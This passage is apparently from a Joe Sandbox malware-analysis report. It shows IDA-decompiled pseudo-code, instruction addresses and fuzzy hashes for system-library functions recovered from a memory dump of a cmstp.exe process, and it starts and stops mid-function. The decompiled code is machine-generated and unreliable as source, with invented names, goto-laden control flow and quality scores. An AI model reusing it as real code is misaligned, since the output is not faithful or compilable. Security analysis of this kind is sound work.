									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E050EEEF0(0x51c79a0);
									__eflags =  *0x51c8210 - _t104; // 0x33a2ba8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x51c8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x20033a2b
											_t95 =  *((intOrPtr*)( *_t37));
											E05154888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E050EEB70(_t95, 0x51c79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E051195D0();
											L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E051195D0();
											L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E050EEB70(_t93, 0x51c79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E051195D0();
										L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E051195D0();
										L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x20033a2b
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x3a2bc002
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0510F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x050d52a5
0x050d52ad
0x050d52b0
0x050d52b3
0x050d52b7
0x050d52ba
0x050d52bf
0x050d52c4
0x050d52cc
0x00000000
0x00000000
0x050d52ce
0x050d52d1
0x050d52d9
0x050d52dd
0x050d52e7
0x050d52f7
0x050d52f9
0x050d52fd
0x05130dcf
0x05130dd5
0x05130dd6
0x05130dd7
0x05130dd8
0x05130dd9
0x05130dde
0x05130ddf
0x05130de0
0x05130de1
0x05130de2
0x05130de2
0x05130de5
0x05130dea
0x05130dec
0x05130f60
0x05130f64
0x05130f70
0x05130f76
0x05130f79
0x05130f79
0x00000000
0x05130f64
0x05130df2
0x05130df7
0x05130e04
0x05130e04
0x05130e0d
0x05130e0d
0x05130e10
0x05130e1a
0x05130e1c
0x05130e4c
0x05130e52
0x05130e61
0x05130e67
0x05130e6b
0x05130e70
0x05130e76
0x05130ed7
0x05130edc
0x05130ee0
0x05130ee6
0x05130eea
0x05130eed
0x05130ef0
0x05130ef3
0x05130ef6
0x05130ef9
0x05130efb
0x05130efe
0x05130f01
0x05130f01
0x05130f0b
0x05130f12
0x05130f16
0x05130f18
0x05130f18
0x05130f1b
0x05130f2c
0x05130f31
0x05130f31
0x05130f35
0x05130f39
0x05130f3a
0x05130f3c
0x05130f3c
0x05130f3f
0x05130f50
0x05130f55
0x05130f55
0x05130f59
0x050d52eb
0x050d52f1
0x050d52f1
0x05130e7d
0x05130e84
0x05130e88
0x05130e8a
0x05130e8a
0x05130e8d
0x05130e9e
0x05130ea3
0x05130ea3
0x05130ea7
0x05130eaf
0x05130eb3
0x05130eb9
0x05130eb9
0x05130ebc
0x05130ecd
0x05130ecd
0x00000000
0x05130eb3
0x05130e1e
0x05130e21
0x05130e25
0x05130e2b
0x05130e2f
0x05130e30
0x05130e3a
0x05130e3f
0x05130e41
0x00000000
0x00000000
0x05130e47
0x00000000
0x05130e47
0x05130df9
0x05130dfe
0x00000000
0x00000000
0x00000000
0x05130dfe
0x050d5303
0x050d5307
0x00000000
0x050d5309
0x00000000
0x050d5309
0x050d5307
0x050d52e9
0x050d52e9
0x00000000
0x050d52e9
0x050d530e
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94bc162b3190609b9b044a14ec71972980722f592f744eda8f8373efef26ace1
Instruction ID: c979f049f2c321ae02de8c4429806df497baddaed1f8bc9005f33dabbc7b83ed
Opcode Fuzzy Hash: 94bc162b3190609b9b044a14ec71972980722f592f744eda8f8373efef26ace1
Instruction Fuzzy Hash: D151BE31205341AFD721EF64D84AB6BBBE5FF54710F10091EF89587691E774E844CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05102AE4 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05102AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x51c8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x51c8208; // 0x51c8207
				_t8 = _t57 + 0x51c8208; // 0x51c8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x51c8450; // 0x33a10f2
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x51c821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x51c6d5c; // 0x7f910654
							_t72 =  *0x51c6d5c; // 0x7f910654
							_t75 =  *0x51c6d5c; // 0x7f910654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x51c6d5c; // 0x7f910654
							_t84 =  *0x51c6d5c; // 0x7f910654
							_t87 =  *0x51c6d5c; // 0x7f910654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0511F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x05102ae4
0x05102aec
0x05102aef
0x05102af4
0x05102af7
0x05102afd
0x05102b92
0x05102b92
0x05102b97
0x05102b9c
0x05102b9c
0x05102b03
0x05102b06
0x05102b09
0x05102b09
0x05102b0f
0x05102b15
0x05102b15
0x05102b1b
0x05102b1e
0x05102b21
0x05102b26
0x05102b29
0x05102b81
0x05102b84
0x05102c0e
0x05102c15
0x05102c24
0x05102c24
0x05102b8a
0x05102b8a
0x05102b8a
0x05102b8a
0x05102b90
0x00000000
0x00000000
0x00000000
0x00000000
0x05102b4a
0x05102b4a
0x05102b4d
0x05102b53
0x00000000
0x00000000
0x05102b55
0x05102b58
0x05102bb7
0x05145d1b
0x05145d37
0x05145d47
0x05145d53
0x05102bbd
0x05102bbd
0x05102bbd
0x05102bb7
0x05102b5d
0x05102c2f
0x05145d5b
0x05145d77
0x05145d87
0x05145d93
0x05102c35
0x05102c35
0x05102c35
0x05102c2f
0x05102b65
0x05102b9f
0x05102ba2
0x05102b67
0x05102b67
0x05102b69
0x05102b6b
0x05102b6e
0x05102bc9
0x05102bcc
0x05102bcf
0x05102bd4
0x05102bd6
0x05102bd6
0x05102bdb
0x05102c02
0x05102c05
0x05102c07
0x00000000
0x05102c07
0x05102be0
0x05102c00
0x05102c3f
0x05102c3f
0x00000000
0x05102c00
0x05102be5
0x05102be7
0x05102bec
0x05102bf4
0x05102bf6
0x00000000
0x05102bf6
0x05102b70
0x05102b76
0x05102b2b
0x05102b2b
0x05102b2d
0x05102b2f
0x05102b32
0x05102b35
0x05102b3a
0x00000000
0x05102b40
0x05102b43
0x05102b45
0x05102b47
0x05102b4a
0x05102b4d
0x05102b53
0x00000000
0x00000000
0x00000000
0x05102b53
0x05102b78
0x05102b78
0x05102b7b
0x05102b7e
0x00000000
0x05102b7e
0x05102b76
0x05102ba5
0x05102ba5
0x05102ba8
0x05102bad
0x00000000
0x00000000
0x05102baf
0x05102baf
0x05102bc2
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85666dbe570b535f0ced72683fc08785782011493962da40ebc74dd48e5b8222
Instruction ID: bbbb0ac22f5650e6d6e360987d03ee1c04d5c590a4955c9afc1fb88f0e0dd202
Opcode Fuzzy Hash: 85666dbe570b535f0ced72683fc08785782011493962da40ebc74dd48e5b8222
Instruction Fuzzy Hash: 8551D87AB00125DFC728DF1CC4D89BDBBB2FB88700716845AE8669B390D775AA41C790

Uniqueness

Uniqueness Score: -1.00%

Function 05103C3E Relevance: .2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E05103C3E(void* __ecx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v44;
				void* _v52;
				void* __ebx;
				signed char _t59;
				intOrPtr _t65;
				signed int _t67;
				void* _t75;
				signed char* _t78;
				intOrPtr _t79;
				signed int _t91;
				signed int _t104;
				void* _t127;
				signed int _t134;
				void* _t136;

				_t136 = (_t134 & 0xfffffff8) - 0x14;
				_t127 = __ecx;
				_v20 = 0;
				E05104E70(0x51c86d0, 0x5105330, 0, 0);
				if(E05103FCD( &_v24) < 0 ||  *((intOrPtr*)(_t136 + 0x1c)) > 0xa) {
					_t59 = _v20;
				} else {
					_t59 = 3;
					_v20 = _t59;
				}
				_v20 = E05103F33(_t127, _t59);
				_v28 = 0;
				_push(E05100678(_t127, 1));
				_push(0x2000);
				_push( &_v20);
				_push(0);
				_push( &_v28);
				_push(0xffffffff);
				if(E05119660() < 0) {
					L16:
					_t65 = 0;
					goto L13;
				} else {
					if((_v20 & 0x00000001) != 0) {
						_t67 = 1;
					} else {
						_t67 =  *0x51c6240; // 0x4
					}
					_t104 = _t67 * 0x18;
					_t12 = _t104 + 0x7d0; // 0x7d1
					 *((intOrPtr*)(_t136 + 0x18)) = _t12;
					_push(E05100678(_t127, 1));
					_push(0x1000);
					_push(_t136 + 0x20);
					_push(0);
					_push( &_v24);
					_push(0xffffffff);
					if(E05119660() < 0) {
						 *((intOrPtr*)(_t136 + 0x18)) = 0;
						E0510174B( &_v24, _t136 + 0x18, 0x8000);
						goto L16;
					} else {
						_t75 = E050F7D50();
						_t132 = 0x7ffe0380;
						if(_t75 != 0) {
							_t78 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t78 = 0x7ffe0380;
						}
						if( *_t78 != 0) {
							_t79 =  *[fs:0x30];
							__eflags =  *(_t79 + 0x240) & 0x00000001;
							if(( *(_t79 + 0x240) & 0x00000001) == 0) {
								goto L10;
							}
							__eflags = E050F7D50();
							if(__eflags != 0) {
								_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							}
							E05191582(_t104, _t127, _v24, __eflags,  *((intOrPtr*)(_t136 + 0x20)),  *(_t127 + 0x74) << 3,  *_t132 & 0x000000ff);
							E0519138A(_t104, _t127, _v36, _v24, 9);
							goto L10;
						} else {
							L10:
							E05103EA8(_t127, _v24, _v20);
							 *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1e4)) =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1e4)) + _v20;
							 *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1e8)) =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1e8)) +  *((intOrPtr*)(_t136 + 0x18));
							 *((intOrPtr*)(_v28 + 0x18)) = _v20 + _v28;
							 *((intOrPtr*)(_v28 + 0x14)) =  *((intOrPtr*)(_t136 + 0x18)) + _v28;
							_t35 = _v28 + 0x7d0; // 0x7d0
							 *((intOrPtr*)(_v28 + 0x10)) = _t35 + _t104;
							_t91 =  *0x51c84b4; // 0x5
							if((_t91 & 0x00000003) == 0) {
								 *0x51c84b4 = _t91 | 0x00000001;
								E05101129();
							}
							 *(_v24 + 0x1b8) = _v20;
							_t65 = _v24;
							L13:
							return _t65;
						}
					}
				}
			}

0x05103c46
0x05103c4e
0x05103c5c
0x05103c60
0x05103c70
0x05103c7d
0x051462a2
0x051462a4
0x051462a5
0x051462a5
0x05103c8b
0x05103c90
0x05103c99
0x05103c9a
0x05103ca3
0x05103ca4
0x05103ca9
0x05103caa
0x05103cb3
0x051462c5
0x051462c5
0x00000000
0x05103cb9
0x05103cbe
0x051462ce
0x05103cc4
0x05103cc4
0x05103cc4
0x05103cc9
0x05103cd1
0x05103cd7
0x05103ce0
0x05103ce1
0x05103cea
0x05103ceb
0x05103cf0
0x05103cf1
0x05103cfa
0x051462b7
0x051462c0
0x00000000
0x05103d00
0x05103d00
0x05103d05
0x05103d0c
0x051462dd
0x05103d12
0x05103d12
0x05103d12
0x05103d17
0x051462e7
0x051462ed
0x051462f4
0x00000000
0x00000000
0x051462ff
0x05146301
0x0514630c
0x0514630c
0x0514630c
0x05146327
0x05146338
0x00000000
0x05103d1d
0x05103d1d
0x05103d27
0x05103d37
0x05103d48
0x05103d58
0x05103d65
0x05103d6c
0x05103d74
0x05103d77
0x05103d7e
0x05103d83
0x05103d88
0x05103d88
0x05103d95
0x05103d9b
0x05103d9f
0x05103da5
0x05103da5
0x05103d17
0x05103cfa

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fa800e0da8d0b4cdf3ae221cabdac401c4a996dea7c14afe7a5424ce7f73b3e
Instruction ID: 32ffa7df28119e296b7cedd08dc7fbfd407b2a508f30fe53646802a22d99ce6d
Opcode Fuzzy Hash: 0fa800e0da8d0b4cdf3ae221cabdac401c4a996dea7c14afe7a5424ce7f73b3e
Instruction Fuzzy Hash: 3C517F71608341AFD700DF28D888E6ABBE9FF84214F14496AF8A9C7281D770D905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0519AE44 Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0519AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0519C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0519ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0519FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0519EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E050F7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E05191608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E051A1536(0x51c8ae4, (_t74 -  *0x51c8b04 >> 0x14) + (_t74 -  *0x51c8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0519C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0519A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0517CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0519ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x0519ae44
0x0519ae4c
0x0519ae53
0x0519ae55
0x0519ae5c
0x0519ae64
0x0519ae68
0x0519ae75
0x0519ae75
0x0519ae78
0x0519ae7a
0x0519ae7c
0x0519ae7f
0x0519aea8
0x0519aeab
0x0519aead
0x00000000
0x00000000
0x0519aeb3
0x0519aeb8
0x0519aebb
0x0519aebd
0x00000000
0x0519ae81
0x0519ae88
0x0519ae8f
0x0519ae9b
0x0519ae96
0x0519ae96
0x0519ae96
0x0519aea0
0x0519aea3
0x0519aebf
0x0519aebf
0x0519aec3
0x0519aec9
0x0519af0d
0x0519af14
0x0519af3d
0x0519af3d
0x0519af41
0x0519af44
0x0519af67
0x0519af67
0x0519af6a
0x0519afca
0x0519afd1
0x00000000
0x0519afd1
0x0519af6c
0x0519af6d
0x0519af75
0x0519af7c
0x0519af7e
0x0519af80
0x0519af85
0x0519af87
0x0519af99
0x0519af89
0x0519af92
0x0519af92
0x0519af9e
0x0519afa1
0x0519afa3
0x0519afa9
0x0519afb0
0x0519afb2
0x0519afb4
0x0519afbc
0x0519afbc
0x0519afb4
0x0519afb0
0x00000000
0x0519afa1
0x0519af4f
0x0519af57
0x0519af5c
0x0519af5e
0x00000000
0x00000000
0x0519af60
0x0519af64
0x0519af64
0x00000000
0x0519af64
0x0519af1a
0x0519af25
0x00000000
0x00000000
0x0519af27
0x0519af28
0x0519af33
0x00000000
0x0519aed0
0x0519aed0
0x0519aed2
0x0519aee1
0x0519aee4
0x00000000
0x00000000
0x0519aee6
0x0519aeec
0x00000000
0x00000000
0x0519aefb
0x0519af07
0x0519afd3
0x0519afdb
0x0519afdb
0x00000000
0x0519af07
0x0519aed6
0x0519aed8
0x0519aedf
0x00000000
0x00000000
0x00000000
0x0519aedf
0x0519aec9

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e2d3bd7483df4598e2c293593c6df38e6a3447af7e54f02f3daa9256a7eca49
Instruction ID: 9fefca223f5ce7bff4210a7ede6c23cbeecdbe86d8a8e22257bdd7439d08815a
Opcode Fuzzy Hash: 7e2d3bd7483df4598e2c293593c6df38e6a3447af7e54f02f3daa9256a7eca49
Instruction Fuzzy Hash: E741F4B1704211ABCF2EDA29C898F7FB79AFF84620F05421DF81787690DB38D849C691

Uniqueness

Uniqueness Score: -1.00%

Function 050FDBE9 Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E050FDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E050DCC50(E050D4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E050F7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E051A8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E050F2280(_t58, _v44);
						E050FDD82(_v44, _t102, _t98);
						E050FB944(_t102, _v5);
						return E050EFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x51c8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x51c862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x51c8628; // 0x0
						_t105 = _v28;
